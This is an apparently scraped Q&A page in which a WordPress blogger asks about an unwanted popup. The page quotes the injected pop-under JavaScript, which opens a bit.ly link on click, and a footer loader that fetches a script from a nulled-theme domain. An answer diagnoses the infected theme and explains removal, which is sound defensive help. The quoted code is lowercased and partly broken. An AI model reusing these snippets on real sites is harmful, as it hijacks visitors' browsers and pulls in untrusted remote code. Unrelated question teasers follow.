Malicious popup injected in my Wordpress site -

-

i setup own blog using wordpress. don't have lots of experience think managed ok create nice. here's link, http://blog.yveschaput.com (it's in french)

my problem have popup coming when 1 clicking first time on link on site. once popups, doesn't reappear again until seems randomly set time or event. injected javascript script in page visitor first viewing, not in home page.

anyone has idea script might come from? i'm guessing plugin use can't seem find one.

here's code being injected:

var pushown = false; var popwidth = 1370; var popheight = 800; var popfocus = 0; var _top = null;  function getwindowheight() { var myheight = 0; if( typeof( _top.window.innerheight ) == 'number' ) { myheight = _top.window.innerheight; } else if( _top.document.documentelement && _top.document.documentelement.clientheight ) { myheight = _top.document.documentelement.clientheight; } else if( _top.document.body && _top.document.body.clientheight ) { myheight = _top.document.body.clientheight; } return myheight; }  function getwindowwidth() { var mywidth = 0; if( typeof( _top.window.innerwidth ) == 'number' ) { mywidth = _top.window.innerwidth; } else if( _top.document.documentelement && _top.document.documentelement.clientwidth ) { mywidth = _top.document.documentelement.clientwidth; } else if( _top.document.body && _top.document.body.clientwidth ) { mywidth = _top.document.body.clientwidth; } return mywidth; }  function getwindowtop() { return (_top.window.screentop != undefined) ? _top.window.screentop : _top.window.screeny; }  function getwindowleft() { return (_top.window.screenleft != undefined) ? _top.window.screenleft : _top.window.screenx; }  function doopen(url) { var popurl = "about:blank" var popid = "ad_" + math.floor(89999999*math.random()+10000000); var pxleft = 0; var pxtop = 0; pxleft = (getwindowleft() + (getwindowwidth() / 2) - (popwidth / 2)); pxtop = (getwindowtop() + (getwindowheight() / 2) - (popheight / 2));  if ( pushown == true ) { return true; }  var popwin=_top.window.open(popurl,popid,'toolbar=0,scrollbars=1,location=1,statusbar=1,menubar=0,resizable=1,top=' + pxtop + ',left=' + pxleft + ',width=' + popwidth + ',height=' + popheight);  if (popwin) { pushown = true;  if (popfocus == 0) { popwin.blur();  if (navigator.useragent.tolowercase().indexof("applewebkit") > -1) { _top.window.blur(); _top.window.focus(); } }  popwin.init = function(e) {  (e) {  params = e.params; main = function(){  if (typeof window.mozpaintcount != "undefined") { var x = window.open("about:blank"); x.close();  }  var popurl = params.popurl;  try { opener.window.focus(); } catch (err) { }  window.location = popurl; }  main(); } };  popwin.params = { popurl: url }  popwin.init(popwin); }  return popwin; }  function setcookie(name, value, time) { var expires = new date();  expires.settime( expires.gettime() + time );  document.cookie = name + '=' + value + '; path=/;' + '; expires=' + expires.togmtstring() ; }  function getcookie(name) { var cookies = document.cookie.tostring().split('; '); var cookie, c_name, c_value;  (var n=0; n<cookies.length; n++) { cookie  = cookies[n].split('='); c_name  = cookie[0]; c_value = cookie[1];  if ( c_name == name ) { return c_value; } }  return null; }  function initpu() {  _top = self;  if (top != self) { try { if (top.document.location.tostring()) _top = top; } catch(err) { } }  if ( document.attachevent ) { document.attachevent( 'onclick', checktarget ); } else if ( document.addeventlistener ) { document.addeventlistener( 'click', checktarget, false ); } }  function checktarget(e) { if ( !getcookie('popundr') ) { var e = e || window.event; var win = doopen('http://bit.ly/1cbiszv'); setcookie('popundr', 1, 24*60*60*1000); } }  initpu();

the code being injected hacked theme, @ footer. can see in source code, before injected code can see code injected too:

<script type="text/javascript">     if(!document.referrer || document.referrer == '') {         document.write('<scr'+'ipt type="text/javascript" src="http://theme.nulledclonescripts.com/jquery.min.js"></scr'+'ipt>');     } else {         document.write('<scr'+'ipt type="text/javascript"  src="http://theme.nulledclonescripts.com/jquery.min.js"></scr'+'ipt>');     } </script>

and can see quote theme.nulledclonescripts.com, , code injected after quote appears <!-- wp_footer --> code included in footer file.

that's bad thing hacking themes instead of buying them, come malicious scripts.

to remove use notepad notepad++ , use function search in files , search this: bit.ly/1cbiszv, remove malicious code.

semi offtopic quote:

as quote hacking/cracking software , it's bad consequences final user, read too: http://www.android-app-development.ie/blog/2013/03/06/inserting-keylogger-code-in-android-swiftkey-using-apktool/

if user hacks android software too, maybe passwords everywhere on internet. i'm not getting angry you, download hacked software too, i'm warning being careful when doing that.


Comments

Post a Comment

Popular posts from this blog

html - Styling progress bar with inline style -

-
i trying set progress bar color red using inline style. need in way because have access <body> part of document. style need apply: progress { color: red } progress::-moz-progress-bar { background: red;} progress::-webkit-progress-value { background: red; } progress[aria-valuenow]:before { background: red; } i tried <progress style="background: red;"> incorrect effect, progress bar color turns blue red background. guide right direction desired style? thank in advance. here live example: https://jsfiddle.net/z36d3f6l/
Read more

java - Oracle Sql developer error: could not install some modules -

-
i have downloaded fresh copy of sqldeveloper ( sqldeveloper-4.1.3.20.78-no-jre ) oracle website. when unzip , lauch gui, keep getting following error message: warning - not install modules: dynamic module config - no module providing capability org.netbeans.netbinox found. my system: windows 7 32 bit hp probook. jdk 1.6 , 1.7, 1.8 available in java/jdk subdirectory. netbeans 8.0.2 installed finally got way out after dirty hours. extracted sqldeveloper zip in nested directory. i.e: e://a/b/c/sqldeveloper. starting sqldeveloper gui above directory threw erros. solution: go in c:\users**username**\appdata\roaming : delete sql developer , sqldeveloper folders extract sql developer zip in new non nested directory. i.e: e:// start , should work now reference: https://community.oracle.com/thread/3870680?start=0&tstart=0
Read more

How to use autoclose brackets in Jupyter notebook? -

-
this may sound silly question, how make use of autoclose brackets in jupyter notebook? example, when type print( jupyter notebook auto-closes brakets print() and places cursor inside. type argument, say print(1 + 1) now cursor between second 1 , right bracket ) . key navigate right of ) ? of course can press end or → or ) achieve this, not seem save time, purpose of brackets autoclose suppose? thanks in advance.
Read more